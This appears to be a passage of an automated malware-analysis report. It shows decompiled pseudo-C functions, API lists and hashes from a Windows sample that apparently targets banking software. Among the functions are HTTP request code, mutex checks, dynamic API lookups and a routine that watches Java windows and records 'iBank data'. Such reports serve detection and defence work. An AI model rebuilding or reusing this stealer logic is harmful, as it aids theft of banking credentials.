        0x00404b64
        0x00000000
        0x00404b84
        0x00404b84
        0x00404b86
        0x00404b23
        0x00404b15
        0x00404b9d
        0x00404b9d
        0x00404b9f
        0x00404bad

        APIs
        • GetCurrentThread.KERNEL32 ref: 00404AF7
        • SetThreadPriority.KERNEL32(00000000), ref: 00404AFE
        • GetLogicalDrives.KERNEL32 ref: 00404B17
        • GetDriveTypeW.KERNEL32(?), ref: 00404B5B
        • WaitForSingleObject.KERNEL32(?,00002710), ref: 00404B7A
        • WaitForSingleObject.KERNEL32(?,00002710), ref: 00404B8F
        • RtlExitUserThread.NTDLL(00000000), ref: 00404BA1
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Thread$ObjectSingleWait$CurrentDriveDrivesExitLogicalPriorityTypeUser
        • String ID: ryStringW
        • API String ID: 97270378-1359682944
        • Opcode ID: 39f8447d1111619beef7cd5d6b58bc9344308288afb233aeb469486f680bb3df
        • Instruction ID: cdb096cdea3e56584862f1877e83bea784b41d171cfcc808254d0d34786fc7e4
        • Opcode Fuzzy Hash: 39f8447d1111619beef7cd5d6b58bc9344308288afb233aeb469486f680bb3df
        • Instruction Fuzzy Hash: 2A11AE721142009BD720ABB4EC09B9777B8EFC0722F10893AF955D22E0D738D844CBAA
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040FB26, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 59networkCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0040FB26(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
				long _t19;
				void* _t21;
				char* _t27;
				void* _t29;

				_t19 = 0x8404f300;
				if((_a20 & 0x00000002) != 0) {
					_t19 = 0x8444f300;
				}
				if((_a20 & 0x00000004) != 0) {
					_t19 = _t19 | 0x00800000;
				}
				_t27 = "POST";
				if((_a20 & 0x00000001) == 0) {
					_t27 = "GET";
				}
				_t29 = HttpOpenRequestA(_a4, _t27, _a8, "HTTP/1.1", 0, "�?@", _t19, 0);
				if(_t29 == 0) {
					L12:
					_t21 = 0;
				} else {
					if(HttpSendRequestA(_t29, 0, 0, _a12, _a16) == 0) {
						L11:
						InternetCloseHandle(_t29);
						goto L12;
					} else {
						_a20 = 0;
						_a8 = 4;
						if(HttpQueryInfoA(_t29, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
							goto L11;
						} else {
							_t21 = _t29;
						}
					}
				}
				return _t21;
			}







        0x0040fb2d
        0x0040fb32
        0x0040fb34
        0x0040fb34
        0x0040fb3d
        0x0040fb3f
        0x0040fb3f
        0x0040fb48
        0x0040fb4d
        0x0040fb4f
        0x0040fb4f
        0x0040fb72
        0x0040fb76
        0x0040fbc2
        0x0040fbc2
        0x0040fb78
        0x0040fb89
        0x0040fbbb
        0x0040fbbc
        0x00000000
        0x0040fb8b
        0x0040fb9a
        0x0040fb9d
        0x0040fbac
        0x00000000
        0x0040fbb7
        0x0040fbb7
        0x0040fbb7
        0x0040fbac
        0x0040fb89
        0x0040fbc7

        APIs
        • HttpOpenRequestA.WININET(?,POST,00000000,HTTP/1.1,00000000,?@,8404F300,00000000), ref: 0040FB6C
        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040FB81
        • HttpQueryInfoA.WININET(00000000,20000013,00000001,00000000,00000000), ref: 0040FBA4
        • InternetCloseHandle.WININET(00000000), ref: 0040FBBC
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
        • String ID: GET$HTTP/1.1$POST$?@
        • API String ID: 3080274660-1836395888
        • Opcode ID: 341dcc06ba2eddd648576a271ae9f5a28be8a0538efa2b3f1a56577f713ec8e3
        • Instruction ID: 9737bc1cec33add7b11a0ab3dd2fb0794f81c36a62b024b0710f594c5e54eb61
        • Opcode Fuzzy Hash: 341dcc06ba2eddd648576a271ae9f5a28be8a0538efa2b3f1a56577f713ec8e3
        • Instruction Fuzzy Hash: 86115471200119AADB318F51DC58FEB3EADDF95794F108036FE05A15D0D6B8E958CBE8
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00407C9A, Relevance: 13.6, APIs: 9, Instructions: 90sleepsynchronizationCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00407C9A(void* __ecx, void* __edi, intOrPtr _a4, int _a7) {
				int _v12;
				long _v16;
				void* _v20;
				short _v544;
				short _v1064;
				void* _t26;
				void* _t41;
				int _t44;
				void* _t45;
				void* _t46;

				_t46 = __edi;
				_t45 = __ecx;
				E0040B058(__edi, _a4, 1,  &_v544);
				E0040B058(__edi, _a4, 2,  &_v1064);
				_t44 = 0;
				_t26 = OpenMutexW(0x1f0001, 0,  &_v1064);
				if(_t26 == 0) {
					_t26 = OpenMutexW(0x1f0001, 0,  &_v544);
					if(_t26 != 0) {
						goto L1;
					}
					_v20 = CreateMutexW(0x4155b4, 1,  &_v544);
					if(E00407DA0(__edi, _t45, 0x405b75 -  *0x414ca0, 0) != 0) {
						_a7 = 1;
						_v16 = 0;
						_v12 = 0;
						while(GetExitCodeProcess(_t46,  &_v16) != 0) {
							if(_v16 != 0x103) {
								L15:
								_t44 = _a7;
								goto L5;
							}
							_t41 = OpenMutexW(0x1f0001, _t44,  &_v1064);
							if(_t41 != _t44) {
								CloseHandle(_t41);
								goto L15;
							}
							_v12 = _v12 + 1;
							if(_v12 > 0x1f4) {
								_a7 = _t44;
								goto L15;
							}
							Sleep(0x14);
						}
						goto L15;
					}
					L5:
					CloseHandle(_v20);
					return _t44;
				}
				L1:
				CloseHandle(_t26);
				return 0;
			}













        0x00407c9a
        0x00407c9a
        0x00407cb2
        0x00407cc4
        0x00407cd0
        0x00407cd9
        0x00407ce1
        0x00407cfb
        0x00407d03
        0x00000000
        0x00000000
        0x00407d19
        0x00407d32
        0x00407d41
        0x00407d45
        0x00407d48
        0x00407d7e
        0x00407d54
        0x00407d9b
        0x00407d9b
        0x00000000
        0x00407d9b
        0x00407d5f
        0x00407d67
        0x00407d90
        0x00000000
        0x00407d90
        0x00407d6c
        0x00407d74
        0x00407d98
        0x00000000
        0x00407d98
        0x00407d78
        0x00407d78
        0x00000000
        0x00407d8d
        0x00407d34
        0x00407d37
        0x00000000
        0x00407d3d
        0x00407ce3
        0x00407ce4
        0x00000000

        APIs
          • Part of subcall function 0040B058: GetProcessTimes.KERNEL32(00000002,00000002,?,?,?,?,?,?,?,?,00405842,00000002,?), ref: 0040B071
          • Part of subcall function 0040B058: wnsprintfW.SHLWAPI ref: 0040B093
        • OpenMutexW.KERNEL32(001F0001,00000000,?,?,?,00000002,?,?,?,00000001,?), ref: 00407CD9
        • CloseHandle.KERNEL32(00000000,?,?,00000002,?,?,?,00000001,?), ref: 00407CE4
        • OpenMutexW.KERNEL32(001F0001,00000000,?,?,?,00000002,?,?,?,00000001,?), ref: 00407CFB
        • CreateMutexW.KERNEL32(004155B4,00000001,?,?,?,00000002,?,?,?,00000001,?), ref: 00407D13
        • CloseHandle.KERNEL32(?,?,?,-0000F12B,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00407D37
        • OpenMutexW.KERNEL32(001F0001,00000000,?,?,?,-0000F12B,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00407D5F
        • Sleep.KERNEL32(00000014,?,?,-0000F12B,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00407D78
        • GetExitCodeProcess.KERNEL32(?,?), ref: 00407D83
        • CloseHandle.KERNEL32(00000000,?,?,-0000F12B,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00407D90
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Mutex$CloseHandleOpen$Process$CodeCreateExitSleepTimeswnsprintf
        • String ID:
        • API String ID: 3355469312-0
        • Opcode ID: d30571f83592f7c60a62f0c3bd1773634b04f348685885d61a9388639b605636
        • Instruction ID: 7ab6b212f595fd8f1a556c67e2a1347ecc942016070378ad47a6102b765a2f41
        • Opcode Fuzzy Hash: d30571f83592f7c60a62f0c3bd1773634b04f348685885d61a9388639b605636
        • Instruction Fuzzy Hash: A8315AB1944108AFDF109B90AC88AFE7BBDEF45304F508077F605E2191D738AA458B6A
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040E503, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137windowthreadnetworkCOMMON
        Download Yara Rule
        C-Code - Quality: 97%
        			E0040E503(void* __ecx, void* _a16, int _a20) {
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void _v24;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v64;
				char* _v68;
				void* _v84;
				struct tagMSG _v112;
				char _v372;
				char _v1396;
				void* __ebx;
				void* __edi;
				char* _t53;
				void* _t65;
				void* _t86;
				void* _t90;
				signed int _t91;
				int _t94;

				_v8 = _v8 | 0xffffffff;
				_t90 = 0x3c;
				E0040F21C( &_v84,  &_v84, 0, _t90);
				E0040F21C( &_v372,  &_v372, 0, 0x104);
				E0040F21C( &_v1396,  &_v1396, 0, 0x400);
				_t94 = _a20;
				_v68 =  &_v372;
				_v40 =  &_v1396;
				_t53 = ( *(_t94 + 6) & 0x0000ffff) + _t94;
				_v84 = _t90;
				_v64 = 0x103;
				_v36 = 0x3ff;
				_a20 = 0;
				if(( *(_t94 + 2) & 0x00000004) != 0) {
					_t53 = E0040C6FE(__ecx, ( *(_t94 + 4) & 0x0000ffff) + _t94, _t53, _a16);
					_a20 = _t53;
				}
				if(InternetCrackUrlA(_t53, 0, 0,  &_v84) == 0) {
					L14:
					E0040F15E(_a20);
					return _v8;
				}
				_push( *((intOrPtr*)(_a16 + 0x420)));
				_t86 = 2;
				_t91 = E0040CCAB(_t86);
				if(_t91 == 0xffffffff) {
					goto L14;
				}
				_v24 = _a16;
				_v16 =  &_v84;
				_v20 = _t91 * 0x30 +  *0x414f5c;
				_v12 = 0;
				_t65 = CreateThread(0, 0, E0040E312,  &_v24, 0, 0);
				_a16 = _t65;
				if(_t65 == 0) {
					L10:
					if(_v12 != 1) {
						E0040CD37(_t91, 0, _t91);
					} else {
						_v8 = 1;
						if( *(_t94 + 0xc) > 0) {
							E0040F15E( *0x414f60);
							E0040F15E( *0x414f64);
							 *0x414f60 = E0040F346(( *(_t94 + 0xc) & 0x0000ffff) + _t94 | 0xffffffff, ( *(_t94 + 0xc) & 0x0000ffff) + _t94);
							 *0x414f64 = E0040F346(( *(_t94 + 4) & 0x0000ffff) + _t94 | 0xffffffff, ( *(_t94 + 4) & 0x0000ffff) + _t94);
						}
					}
					goto L14;
				}
				L7:
				while(PeekMessageW( &_v112, 0, 0, 0, 1) != 0) {
					DispatchMessageW( &_v112);
				}
				if(MsgWaitForMultipleObjects(1,  &_a16, 0, 0xffffffff, 0x4bf) != 0) {
					goto L7;
				}
				CloseHandle(_a16);
				goto L10;
			}
























        0x0040e50c
        0x0040e515
        0x0040e51e
        0x0040e530
        0x0040e542
        0x0040e547
        0x0040e550
        0x0040e559
        0x0040e560
        0x0040e566
        0x0040e569
        0x0040e570
        0x0040e577
        0x0040e57a
        0x0040e586
        0x0040e58b
        0x0040e58b
        0x0040e59d
        0x0040e692
        0x0040e695
        0x0040e6a1
        0x0040e6a1
        0x0040e5a6
        0x0040e5ae
        0x0040e5b4
        0x0040e5b9
        0x00000000
        0x00000000
        0x0040e5c2
        0x0040e5c8
        0x0040e5da
        0x0040e5e8
        0x0040e5eb
        0x0040e5f1
        0x0040e5f6
        0x0040e638
        0x0040e63c
        0x0040e68d
        0x0040e63e
        0x0040e63e
        0x0040e649
        0x0040e651
        0x0040e65c
        0x0040e670
        0x0040e684
        0x0040e684
        0x0040e649
        0x00000000
        0x0040e63c
        0x00000000
        0x0040e604
        0x0040e5fe
        0x0040e5fe
        0x0040e62d
        0x00000000
        0x00000000
        0x0040e632
        0x00000000

        APIs
        • InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0040E595
        • CreateThread.KERNEL32(00000000,00000000,Function_0000E312,?,00000000,00000000), ref: 0040E5EB
        • DispatchMessageW.USER32(?), ref: 0040E5FE
          • Part of subcall function 0040CD37: WaitForSingleObject.KERNEL32(?,000000FF,?,0040E692), ref: 0040CD4D
          • Part of subcall function 0040CD37: CloseHandle.KERNEL32(?), ref: 0040CD56
          • Part of subcall function 0040CD37: InternetCloseHandle.WININET(?), ref: 0040CDBA
          • Part of subcall function 0040CD37: InternetCloseHandle.WININET(?), ref: 0040CDC3
          • Part of subcall function 0040CD37: InternetCloseHandle.WININET(?), ref: 0040CDCC
        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040E60D
        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004BF), ref: 0040E625
        • CloseHandle.KERNEL32(?), ref: 0040E632
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseHandle$Internet$MessageWait$CrackCreateDispatchMultipleObjectObjectsPeekSingleThread
        • String ID: eateProcessAsUserA
        • API String ID: 646759295-3969283286
        • Opcode ID: 7555143c17019bd1f0b22a36fbd8fa01b790a4a502f8feecfa2f9fe9e1a2fe5a
        • Instruction ID: 0a875fecdd23d4a8ba547816b9739846714ce969b466246a18ab09921baed198
        • Opcode Fuzzy Hash: 7555143c17019bd1f0b22a36fbd8fa01b790a4a502f8feecfa2f9fe9e1a2fe5a
        • Instruction Fuzzy Hash: 0841AEB1900208EBDB209FE5DC85AEF7BBCBB44354F00893AF515A62D0E73999148B68
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00409B83, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 134memorysynchronizationCOMMON
        Download Yara Rule
        C-Code - Quality: 93%
        			E00409B83(intOrPtr __ecx) {
				char* _v8;
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __esi;
				intOrPtr _t29;
				void* _t32;
				intOrPtr* _t33;
				intOrPtr* _t36;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t46;
				char _t49;
				char* _t54;
				intOrPtr _t56;
				char* _t58;
				signed char _t60;
				char* _t61;
				signed char _t62;
				intOrPtr* _t65;
				intOrPtr _t70;
				void* _t71;

				_t57 = __ecx;
				 *0x414a10 =  *0x414a10 & 0x00000000;
				 *0x414a0c =  *0x414a0c & 0x00000000;
				 *0x414ed4("tate");
				if(WaitForSingleObject( *0x414a30, 0xea60) == 0x102) {
					do {
						_t29 = E004089BF( &_v16, _t57, 0, "!213KJhndkmnihjd");
						_t61 = _v16;
						if(_t61 != 0 && _t29 > 5) {
							_t57 = _t29;
							_t32 = E0040F94A(_t61, _t29);
							_t77 = _t32;
							if(_t32 != 0) {
								_v8 = _t61;
								do {
									_t54 = _v8;
									__eflags =  *_t54;
									_t58 = _t54;
									if( *_t54 != 0) {
										while(1) {
											_t49 =  *_t58;
											_t58 = _t58 + 1;
											__eflags = _t49 - 0x7c;
											if(_t49 == 0x7c) {
												goto L10;
											}
											__eflags =  *_t58;
											if( *_t58 != 0) {
												continue;
											}
											goto L10;
										}
									}
									L10:
									__eflags =  *_t58;
									if( *_t58 != 0) {
										_v20 = E004102D2(_t58, E0040F637(_t58));
										_t36 = E0040979F(_t35);
										__eflags = _t36;
										if(_t36 == 0) {
											_t65 = RtlAllocateHeap( *0x415fa8, 8, 0x14);
											__eflags = _t65;
											if(_t65 != 0) {
												_v12 = E0040F637(_t54);
												_t70 = E0040F346(_t38, _t54);
												_t60 = 0;
												__eflags = _t70;
												if(_t70 == 0) {
													L24:
													E0040F15E(_t65);
												} else {
													_t62 = 0;
													__eflags = _v12;
													if(_v12 <= 0) {
														L23:
														E0040F15E(_t70);
														goto L24;
													} else {
														do {
															__eflags =  *((char*)(_t60 + _t70)) - 0x7c;
															if( *((char*)(_t60 + _t70)) != 0x7c) {
																goto L18;
															} else {
																_t10 = _t70 + 1; // 0x1
																_t42 = _t60 + _t10;
																 *((char*)(_t60 + _t70)) = 0;
																 *((intOrPtr*)(_t71 + (_t62 & 0x000000ff) * 4 - 0x18)) = _t42;
																__eflags = _t42;
																if(_t42 == 0) {
																	break;
																} else {
																	_t62 = _t62 + 1;
																	__eflags = _t62 - 2;
																	if(_t62 == 2) {
																		L20:
																		_t56 = _v20;
																		_t43 = E004097DF(_t56);
																		__eflags = _t43;
																		if(_t43 == 0) {
																			goto L23;
																		} else {
																			 *((intOrPtr*)(_t65 + 4)) = _v28;
																			 *_t65 = _t70;
																			 *((intOrPtr*)(_t65 + 8)) = _v24;
																			 *((intOrPtr*)(_t65 + 0xc)) = _t56;
																			 *0x414a2c =  *0x414a2c + 1;
																			_t46 = E0040B81A(_t60, E00409B50, _t65);
																			__eflags = _t46;
																			if(_t46 <= 0) {
																				 *0x414a2c =  *0x414a2c - 1;
																				__eflags =  *0x414a2c;
																				E0040987D(_t56);
																				goto L23;
																			}
																		}
																	} else {
																		goto L18;
																	}
																}
															}
															goto L25;
															L18:
															_t60 = _t60 + 1;
															__eflags = _t60 - _v12;
														} while (_t60 < _v12);
														__eflags = _t62 - 2;
														if(_t62 != 2) {
															goto L23;
														} else {
															goto L20;
														}
													}
												}
											}
										}
									}
									L25:
									_t57 = _v8;
									_t33 = E0040F968(_v8, 1);
									_v8 = _t33;
									__eflags = _t33;
								} while (_t33 != 0);
							} else {
								E00408AA6(_t77, 0, "!213KJhndkmnihjd");
							}
							E0040F15E(_v16);
						}
					} while (WaitForSingleObject( *0x414a30, 0xea60) == 0x102);
				}
				 *0x414a2c =  *0x414a2c - 1;
				return 0;
			}




























        0x00409b83
        0x00409b86
        0x00409b8d
        0x00409b9c
        0x00409bb8
        0x00409bc1
        0x00409bcc
        0x00409bd1
        0x00409bd6
        0x00409be5
        0x00409be9
        0x00409bee
        0x00409bf0
        0x00409bff
        0x00409c02
        0x00409c02
        0x00409c05
        0x00409c08
        0x00409c0a
        0x00409c0c
        0x00409c0c
        0x00409c0e
        0x00409c0f
        0x00409c11
        0x00000000
        0x00000000
        0x00409c13
        0x00409c16
        0x00000000
        0x00000000
        0x00000000
        0x00409c16
        0x00409c0c
        0x00409c18
        0x00409c18
        0x00409c1b
        0x00409c2f
        0x00409c32
        0x00409c37
        0x00409c39
        0x00409c4f
        0x00409c51
        0x00409c53
        0x00409c61
        0x00409c69
        0x00409c6b
        0x00409c6d
        0x00409c6f
        0x00409ce8
        0x00409ce9
        0x00409c71
        0x00409c71
        0x00409c73
        0x00409c76
        0x00409ce2
        0x00409ce3
        0x00000000
        0x00409c78
        0x00409c78
        0x00409c78
        0x00409c7c
        0x00000000
        0x00409c7e
        0x00409c7e
        0x00409c7e
        0x00409c85
        0x00409c89
        0x00409c8d
        0x00409c8f
        0x00000000
        0x00409c91
        0x00409c91
        0x00409c93
        0x00409c96
        0x00409ca3
        0x00409ca3
        0x00409ca6
        0x00409cab
        0x00409cad
        0x00000000
        0x00409caf
        0x00409cb2
        0x00409cb9
        0x00409cbb
        0x00409cbe
        0x00409cc1
        0x00409ccc
        0x00409cd1
        0x00409cd3
        0x00409cd5
        0x00409cd5
        0x00409cdd
        0x00000000
        0x00409cdd
        0x00409cd3
        0x00000000
        0x00000000
        0x00000000
        0x00409c96
        0x00409c8f
        0x00000000
        0x00409c98
        0x00409c98
        0x00409c99
        0x00409c99
        0x00409c9e
        0x00409ca1
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00409ca1
        0x00409c76
        0x00409c6f
        0x00409c53
        0x00409c39
        0x00409cee
        0x00409cee
        0x00409cf3
        0x00409cf8
        0x00409cfb
        0x00409cfb
        0x00409bf2
        0x00409bf5
        0x00409bf5
        0x00409d06
        0x00409d06
        0x00409d1c
        0x00409d29
        0x00409d2a
        0x00409d33

        APIs
        • RtlInitializeCriticalSection.NTDLL(tate), ref: 00409B9C
        • WaitForSingleObject.KERNEL32(0000EA60), ref: 00409BAD
        • RtlAllocateHeap.NTDLL(00000008,00000014), ref: 00409C49
        • WaitForSingleObject.KERNEL32(0000EA60,00000000,!213KJhndkmnihjd), ref: 00409D16
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: ObjectSingleWait$AllocateCriticalHeapInitializeSection
        • String ID: !213KJhndkmnihjd$atorA$eyboardState
        • API String ID: 2333182645-3632419595
        • Opcode ID: 8374f8e74daedc07cf7062891cda39f609523db0bf1aaca67eab7a6dcdc3b20b
        • Instruction ID: 1c7921983c44daa79f4d83fa86534b283f83a35d2151dd0700fe9caf23643b27
        • Opcode Fuzzy Hash: 8374f8e74daedc07cf7062891cda39f609523db0bf1aaca67eab7a6dcdc3b20b
        • Instruction Fuzzy Hash: A541C070E48205AAEB20AF65D886BAE77A5BF81344F10807BE402B76D3D77D9D41879C
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00406CA1, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 118libraryloaderCOMMON
        Download Yara Rule
        C-Code - Quality: 54%
        			E00406CA1(void* __ecx, void* __edx, signed int* _a4) {
				void* __edi;
				void* __esi;
				intOrPtr _t16;
				_Unknown_base(*)()* _t17;
				char* _t19;
				void* _t23;
				void* _t28;
				void* _t31;
				intOrPtr _t34;
				intOrPtr _t37;
				void* _t43;
				signed int* _t45;

				_t41 = __ecx;
				_t43 = __edx;
				if(__ecx == 1) {
					 *_a4 =  *_a4 & 0x00000000;
					return 0x1020716;
				}
				if(__ecx != 2) {
					if(__ecx != 3) {
						if(__ecx != 4) {
							if(__ecx != 5) {
								if(__ecx != 6) {
									if(__ecx != 7) {
										if(__ecx != 8) {
											if(__ecx != 0xa) {
												if(__ecx != 9) {
													if(__ecx != 0xb) {
														if(__ecx != 0xc) {
															if(__ecx != 0xd) {
																if(__ecx != 0xe) {
																	L6:
																	 *_a4 =  *_a4 & 0x00000000;
																	L7:
																	return 0;
																}
																 *_a4 =  *_a4 & 0x00000000;
																_t16 =  *0x414ad4; // 0x241f5a8
																_t17 = GetProcAddress( *0x414d18,  *(_t16 + 0x68));
																if(_t17 != 0) {
																	 *_t17(0x8007);
																}
																 *((intOrPtr*)(0)) = 0;
																_t19 = 0;
																L38:
																 *_t19 = 0;
																_t19 = _t19 + 1;
																goto L38;
															}
															_push( *0x4147d0);
															L33:
															E00406C75(_t43, _a4);
															goto L7;
														}
														_push( *0x4147cc);
														goto L33;
													}
													_push(0x4147e0);
													goto L33;
												}
												 *_a4 =  *_a4 & 0x00000000;
												_t23 =  *0x4147dc; // 0x6e61526c
												if(_t23 != 0) {
													CloseHandle(_t23);
													 *0x4147dc =  *0x4147dc & 0x00000000;
												}
												goto L7;
											}
											_push(0x4147e0);
											_t45 = 0x4147dc;
											L23:
											 *_a4 =  *_a4 & 0x00000000;
											E00406C2F(_t41, _t45);
											goto L7;
										}
										 *_a4 =  *_a4 & 0x00000000;
										_t28 =  *0x4149e8; // 0x616c4374
										if(_t28 != 0) {
											CloseHandle(_t28);
											 *0x4149e8 =  *0x4149e8 & 0x00000000;
										}
										goto L7;
									}
									_push( *0x4147d0);
									_t45 = 0x4149e8;
									goto L23;
								}
								 *_a4 =  *_a4 & 0x00000000;
								_t31 =  *0x4147d8; // 0x6c6f7263
								if(_t31 != 0) {
									CloseHandle(_t31);
									 *0x4147d8 =  *0x4147d8 & 0x00000000;
								}
								goto L7;
							}
							_push( *0x4147cc);
							_t45 = 0x4147d8;
							goto L23;
						}
						 *_a4 =  *_a4 & 0x00000000;
						_t34 =  *0x414c94; // 0x1030
						return _t34;
					}
					SetEvent( *0x4147d4);
					goto L6;
				} else {
					 *_a4 =  *_a4 & 0x00000000;
					_t37 =  *0x414b7c; // 0x418000
					_t3 = _t37 + 8; // 0x30
					return  *_t3;
				}
			}















        0x00406ca1
        0x00406ca6
        0x00406cab
        0x00406cb0
        0x00000000
        0x00406cb3
        0x00406cbd
        0x00406cd2
        0x00406cf1
        0x00406d03
        0x00406d15
        0x00406d39
        0x00406d4b
        0x00406d72
        0x00406d91
        0x00406dbc
        0x00406dc8
        0x00406dd5
        0x00406ded
        0x00406ce0
        0x00406ce3
        0x00406ce6
        0x00000000
        0x00406ce6
        0x00406df6
        0x00406df9
        0x00406e07
        0x00406e0f
        0x00406e16
        0x00406e16
        0x00406e1a
        0x00406e1c
        0x00406e1e
        0x00406e1e
        0x00406e21
        0x00000000
        0x00406e21
        0x00406dd7
        0x00406ddd
        0x00406de0
        0x00000000
        0x00406de0
        0x00406dca
        0x00000000
        0x00406dca
        0x00406dbe
        0x00000000
        0x00406dbe
        0x00406d96
        0x00406d99
        0x00406da0
        0x00406da7
        0x00406dad
        0x00406dad
        0x00000000
        0x00406da0
        0x00406d74
        0x00406d79
        0x00406d7e
        0x00406d81
        0x00406d84
        0x00000000
        0x00406d84
        0x00406d50
        0x00406d53
        0x00406d5a
        0x00406d5d
        0x00406d63
        0x00406d63
        0x00000000
        0x00406d5a
        0x00406d3b
        0x00406d41
        0x00000000
        0x00406d41
        0x00406d1a
        0x00406d1d
        0x00406d24
        0x00406d27
        0x00406d2d
        0x00406d2d
        0x00000000
        0x00406d24
        0x00406d05
        0x00406d0b
        0x00000000
        0x00406d0b
        0x00406cf6
        0x00406cf9
        0x00000000
        0x00406cf9
        0x00406cda
        0x00000000
        0x00406cbf
        0x00406cc2
        0x00406cc5
        0x00406cca
        0x00000000
        0x00406cca

        APIs
        • CloseHandle.KERNEL32(6C6F7263), ref: 00406D27
        • CloseHandle.KERNEL32(616C4374), ref: 00406D5D
        • CloseHandle.KERNEL32(6E61526C), ref: 00406DA7
        • GetProcAddress.KERNELBASE(?), ref: 00406E07
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseHandle$AddressProc
        • String ID: crollRange$tClassLongW
        • API String ID: 4209786425-3577453394
        • Opcode ID: 9f371b96e2cbc969cd6f6ca89997c9fb0b43aba32ca6366163ecf9da05673d6f
        • Instruction ID: 6dedc19bcb722ddf038d00846b89cc405b19e31f7610ddcbdeb035825c7cc767
        • Opcode Fuzzy Hash: 9f371b96e2cbc969cd6f6ca89997c9fb0b43aba32ca6366163ecf9da05673d6f
        • Instruction Fuzzy Hash: BF4117716182009FEB218B54E951BA637A5FF52351F128037E507AB6E0C338DCB09B9E
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00406157, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 85COMMON
        Download Yara Rule
        C-Code - Quality: 65%
        			E00406157(struct HWND__* _a4) {
				void* _v8;
				void* _v12;
				short _v72;
				short _v592;
				void* _t43;
				int _t45;

				_t44 = GetClassNameW(_a4,  &_v72, 0x1d);
				if(_t19 <= 0xb) {
					L10:
					return  *0x414ac8(_a4);
				}
				_push(L"SunAwtDialog");
				_t43 = 0xc;
				if(E0040F6F6(_t19,  &_v72, _t43) == 0) {
					L3:
					_t45 = GetWindowTextW(_a4,  &_v72, 0x3b);
					if(_t45 <= 0xa) {
						goto L10;
					}
					if(_t45 != 0xe) {
						L6:
						if(_t45 != 0x16) {
							goto L10;
						}
						_t41 =  &_v72;
						if(E0040F1DA(0x40202c,  &_v72, 0x2e) != 0) {
							goto L10;
						}
						L8:
						_push( &_v12);
						_push( &_v8);
						_v12 = 0;
						_v8 = 0;
						if(E004065FE() != 0) {
							E004063F9();
							_v592 = 0;
							GetCurrentDirectoryW(0x104,  &_v592);
							_push(PathFindFileNameW( &_v592));
							E0041352B(_t41, _t43, 0, 0xc8, 0, 0, L"iBank data\n\n%S\nDir: %s", _v8);
							 *0x41479c = 1;
						}
						goto L10;
					}
					_t41 =  &_v72;
					if(E0040F1DA(0x40200c,  &_v72, 0x1e) == 0) {
						goto L8;
					}
					goto L6;
				}
				_push(L"javax.swing.JFrame");
				_t43 = 0x12;
				if(E0040F6F6(_t44,  &_v72, _t43) != 0) {
					goto L10;
				}
				goto L3;
			}









        0x00406170
        0x00406175
        0x00406258
        0x00406263
        0x00406263
        0x0040617b
        0x00406182
        0x0040618d
        0x004061a9
        0x004061b8
        0x004061bd
        0x00000000
        0x00000000
        0x004061c6
        0x004061db
        0x004061de
        0x00000000
        0x00000000
        0x004061e7
        0x004061f1
        0x00000000
        0x00000000
        0x004061f3
        0x004061f6
        0x004061fc
        0x004061fd
        0x00406200
        0x0040620a
        0x0040620c
        0x00406213
        0x00406226
        0x00406239
        0x00406249
        0x00406251
        0x00406251
        0x00000000
        0x0040620a
        0x004061cf
        0x004061d9
        0x00000000
        0x00000000
        0x00000000
        0x004061d9
        0x0040618f
        0x00406198
        0x004061a3
        0x00000000
        0x00000000
        0x00000000

        APIs
        • GetClassNameW.USER32(?,?,0000001D), ref: 0040616A
        • GetWindowTextW.USER32(?,?,0000003B), ref: 004061B2
        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,0000002E), ref: 00406226
        • PathFindFileNameW.SHLWAPI(?), ref: 00406233
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Name$ClassCurrentDirectoryFileFindPathTextWindow
        • String ID: SunAwtDialog$iBank data%SDir: %s$javax.swing.JFrame
        • API String ID: 898933475-3318189751
